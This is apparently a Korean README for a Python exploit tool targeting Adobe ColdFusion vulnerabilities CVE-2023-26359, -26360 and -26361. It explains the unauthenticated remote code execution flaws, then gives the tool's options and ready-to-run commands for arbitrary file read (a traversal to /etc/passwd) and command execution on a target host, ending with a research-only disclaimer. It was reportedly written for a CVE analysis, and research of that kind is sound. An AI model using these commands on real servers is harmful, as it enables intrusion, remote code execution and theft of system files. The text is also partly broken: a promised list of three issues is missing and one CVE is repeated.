
원격 파일 읽기 및 명령 실행을 위한 Python 익스플로잇 스크립트로, Adobe ColdFusion 취약점 CVE-2023-26359, CVE-2023-26360, CVE-2023-26361을 대상으로 합니다. 조작된 요청을 통해 임의 파일 읽기 및 RCE를 지원합니다.
2023년 3월 8일, Adobe는 인기 있는 웹 애플리케이션 개발 플랫폼인 Adobe ColdFusion의 심각한 취약점을 해결하기 위해 보안 업데이트를 발표했습니다. 부적절한 접근 제어 및 안전하지 않은 역직렬화로 분류된 이러한 취약점은 공격자가 신뢰할 수 없는 데이터가 포함된 특수하게 조작된 요청을 ColdFusion 서버에 전송할 때 **무단 원격 코드 실행(RCE)**으로 이어집니다.
이 취약점의 악용은 사용자 상호 작용이 필요하지 않으므로, 공격자가 사용자 모르게 현재 사용자의 컨텍스트에서 임의 코드를 실행할 수 있게 하여 특히 심각합니다.
사이버 보안 및 인프라 보안국(CISA)은 2023년 12월 5일, 이 문제의 활발한 악용에 관한 권고를 발표하여 이 문제의 심각성을 강조했습니다. 그들은 이 취약점이 사이버 위협 행위자에 의해 공개된 Adobe ColdFusion 웹 서버에 대한 초기 액세스를 획득하는 데 사용되고 있다고 밝혔습니다. 가장 심각한 취약점의 CVSS 점수는 9.8로, **심각(Critical)**으로 분류됩니다.
기본적으로 추가 조사 후 세 가지 다른 문제가 확인되었습니다:
이 익스플로잇 스크립트는 vsociety)의 CVE 분석을 위해 작성되었습니다.
도움말:
usage: exploit.py [-h] --host HOST [--read-file READ_FILE] [--cmd CMD] [--endpoint ENDPOINT] [--win] [--proxy PROXY]
Exploit script for remote file read or command execution against Adobe ColdFusion (CVE-2023-26359, CVE-2023-26360, and CVE-2023-26359).
options:
-h, --help show this help message and exit
--host HOST Target host URL
--read-file READ_FILE, -f READ_FILE
File path to read from the host
--cmd CMD, -c CMD Command to execute on the target
--endpoint ENDPOINT Endpoint URL
--win Specify this if the target host is considered to be Windows.
--proxy PROXY Proxy URL
# Arbirary file read
python3 exploit.py --host http://localhost:8500 --read-file '../../../../etc/passwd'
# RCE
python3 exploit.py --host http://localhost:8500 --cmd 'CMD'
이 익스플로잇 스크립트는 오직 연구 목적과 효과적인 방어 기술 개발을 위해 제작되었습니다. 악의적이거나 승인되지 않은 활동에 사용하기 위한 것이 아닙니다. 이 스크립트의 작성자와 소유자는 이 소프트웨어로 인한 모든 오용이나 손해에 대해 책임을 지지 않습니다. 사용자는 이 소프트웨어를 책임감 있게, 그리고 관련 법률 및 규정에 따라 사용해야 합니다. 책임감 있게 사용하십시오.